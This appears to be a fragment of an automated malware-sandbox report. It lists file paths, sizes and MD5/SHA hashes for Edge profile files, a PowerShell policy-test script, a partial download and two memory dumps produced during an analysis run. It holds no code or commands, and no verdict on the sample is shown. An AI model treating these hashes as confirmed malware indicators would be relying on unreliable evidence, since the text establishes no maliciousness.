0f454f7832d76802f6f918dd42f380f5fcf12617

SHA256
acd2013d3e6dcd8ac07ee047e5421c9323ceb6af20b6cd36b5766741afc4c45c

SHA512
8261777b98834ca0fb996ff7b126787ab5b16bb1cbedaa8586bc70931e25fb23878997114cd84820fd3bc02666930d492dfd5ab83e45977085d4344944b58570

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
765ae72f8f1a9b8dbeae05419bb44e62

SHA1
cf472ac8cef7169dbd898e486265771fed9a2180

SHA256
78fb3850f514b4a1309ca765b4895163e247d08a2124555d9e44d49809ffaa5a

SHA512
263c45dbb2527051e28f4a41cb25b99007ad091aa857bdb3509d3985d43e99d0d91a6499088749802fa479c81c608e6f8f001f33dbe3af47766774f8933e5812

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe59dd18.TMP

Filesize
48B

MD5
5cd4391c0ae31ec6f2cdc277b59ea17b

SHA1
ab0b1ceb3b8bae76e93d3e24ba6cb709c8f2a6b1

SHA256
7372124da1eab4784a40f504be663c24330b83473d8cd1a0cc13e1e0c5ccd787

SHA512
20e92b74cf755bde1cc2e7fb558336215033682c1f7a3e146b57db5d0cef13f9cc0dd480806f411468c2590077e4732955e1d3de17af7c893033651eec9591f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
536B

MD5
4a269d613e5ac9123b8058284d637440

SHA1
20a160be983b4041039b1afed2c95f062823813b

SHA256
09e4c6376252950a26648259af7fef9721f793afe54486b33e96494afbb419ed

SHA512
22efdf9fb2b42e9394c624e266b10262e8292926077b4b5f0c67719005ea6e80e8bec325bf97288547ccbb0e0c8fb767e74d000bb3bf6f8311c9104569be2e4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
5KB

MD5
8e1fb98b3af7d5b583c7a610e4be69ba

SHA1
dcfd30d9dc7a2b154ebb8743629be61db773cd0b

SHA256
1f31f444ad16fc9c04bbd677179cc8d109e0e134810ba563818a715302c7ed7d

SHA512
c9cc59d83b3b549b4802ea703adf9e0ad9f1ca88f7206c7631c5ee517c7d14858eb63e7d1b2048dbdc63aa43d88dc6b623be6b2fa3c8926982009f88ec09226f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
10KB

MD5
8cd1f477ec7e102ffe1e067b6e3f0561

SHA1
92f1bdd6fdb5ab681f0c5e40a919c52574716e1a

SHA256
af27e221f7b25ef5d4adebe9dee449bf0add7f5a7df7c29fea326003ec87ddc8

SHA512
279bffc35431d80fe473b95246e722e95a15e6ce799e248a3dc315c861554926c77a4128fca0dad8af0cafd9047a6db25e35385724953d63e3b9c8ade54e8360

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
11KB

MD5
89d44f83f209fee3367ebacddaf39b35

SHA1
30723c69e39a10faa8a2fcce966479a2eacbea2f

SHA256
193c0b38277474e378ba603be67f1270131ffcd0f101ea4871af46e2755cd85a

SHA512
e9222d799c5604bfb1a187b5892776c73b62875ba0952c7dc49baf406666a13c86fab42a8e8c0a5b1bf10a01e4d740db7f3ecbdae38a77d3f0879e5f49f58e5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
10KB

MD5
6cb2895020844ea45d472896702625ae

SHA1
813e1ec3351e8bf6413a872f2b1e320036cff9a3

SHA256
a5424951f913fa634169fb274e23bd05e9c8cecc8eeb0eb031c496bdf75b0119

SHA512
6022ea7f2dd2c9b53b2af3ad5cb4d929340ee5f9661c382ac949c006abf025795d3491185b0dabaeb6c7494ef274f67ab635c28be8588478c5521aa59238729b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
10KB

MD5
6ee5d57d4b867918aba90da3047b46a4

SHA1
3e8408afd38ef7308c7d385c328a14694729e5bf

SHA256
1711bec76a643555453c2169f9e4b88b39f87af9843155adab0099e7f727bed2

SHA512
28d609d8de3c5fd138a3897055e7dec3e7d6bb7e3cf7b93342786ebfc81d85d5a2001b47392f78b73e548fc6c5a654756113e4c06c7bea7123d9371bf1e12817

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
11KB

MD5
662eb3c5ff49ce788363ccd0ede29db8

SHA1
008bd070a0b319a96e78ee096de217173a0646bc

SHA256
c35f5d65385ef5a18c8e1764eb597cf73cba9888992dc9e147e7a78af2ad8735

SHA512
5784581dfe8cd587c581a82db939fb4d60005f4e9b698f9edfe186c9043b9477a23821b1ff10b49583cf345d687290d6e6ac4c217d19659af360fba3d80e744d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
6f1bd2d5d200d166e7212556dfec4dd9

SHA1
86bb41088ed6590d7cd8a46d325215758cbdca5c

SHA256
f70b01a18910878f8e4a2bce6ad8207b62c665bb37e23d66e4f7846349834a5c

SHA512
a9cec2b72412774f18aaf0ae1232a617d2ad8adfe3d45ce2bb6509c4f33d05bf4e3840a12cca95eaba1ef01fdf9cb000b59db75e2731ce8bc8eb54f95bd267f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
5KB

MD5
ef13bbe2315595787932f8e732f13d74

SHA1
7545a96e906b0ef5f70537f51c77cbe22a3280cd

SHA256
584d2f22169a9dfa6d3277783ca67a6925e6f6a4380590ded3da97f3f4cba3f3

SHA512
c79c9a48c4e44a674d4ee708d9ea603de583e2a7542d132a7292760e275b5a1d019e3cd6616a08008010b668190d1765455b4ccc7de6c4bb53bdfc7f21dab77e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
9df057cc51abd0c9020d32ff9310e251

SHA1
cdded2795fd4789588149096e9da8bd6f1a90bf5

SHA256
55d470e7a97e346ae6f11ee2e97e58f033dbb147f2c495b4280e6d8ab532513f

SHA512
7e580636a7138bba71105cf3280386e0dcd9adaf22ccba926c1f9101ae93df1afaf50cbb32715b0385bb7a96c126f569a34dc3f08c4520969cd8ed4f63cdb3d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe594145.TMP

Filesize
536B

MD5
8ff6bec62d9e58a1531693dbb1e7bf24

SHA1
781f27fd4aa0ab827e594c5f5167354e46305084

SHA256
1361ecea535267f89d4add2f068eb433fd9444d1231d2eb2b7188dadea651fc5

SHA512
eb9c58a346be370f7d1991905f41d43f8d4b67e85335c102e805d08399b71b031a8df4cf7f91acc8a389f674f263255f9d43a1f1cad535288d1ce43733795100

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
d76b6343695cbd1d4978166c5c265170

SHA1
b7a4756fb7e9116d08e39810c4847531fd6346c8

SHA256
df6f39d9a6a56cda56f8fba3b65aec96f2ccbddad44e068616f9ef2a3b67c36b

SHA512
d597067f654107aa152201b34ad1df9cbafb451360ab9b4c6b3a92049c740b772589dd489c883de84116d18359ce4e4c1e2daffe3fc6b196b163f0145380685e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
f326128b86ede43be82ddc4830b1c7b6

SHA1
efd3d83e58483d1f49780626c20e9e86c86d44df

SHA256
040860e51ab6772ee72e2d2164904d6c7c7cd576628662b951796b83c8e7aa13

SHA512
0cd70f22f5f4e2bbd64f067fb4038b2e136d57ece6c0483af4fa27bc676e70ad067e99faa49b03fd1a570389558d312d80716a5910a6177addfbc590ccfb5506

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qleygove.wph.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 793680.crdownload

Filesize
89KB

MD5
86d68c9cdc087c76e48a453978b63b7c

SHA1
b8a684a8f125ceb86739ff6438d283dbafda714a

SHA256
df51babc1547a461656eaef01b873a91afcf61851b6f5ef06977e1c33e1b5f32

SHA512
dd627f071d994999172048f882ba61407461633634fdb2a3f2b8e6abff6324cc0d78682b5adc4aa4083e5baa1c981687f5c516d9e075eb00dfb58364cee1db04

Download Submit
memory/1056-0-0x0000000000400000-0x0000000000443000-memory.dmp

Filesize
268KB

Download
memory/4312-2014-0x00000221E4050000-0x00000221E4072000-memory.dmp

Filesize
136KB

Download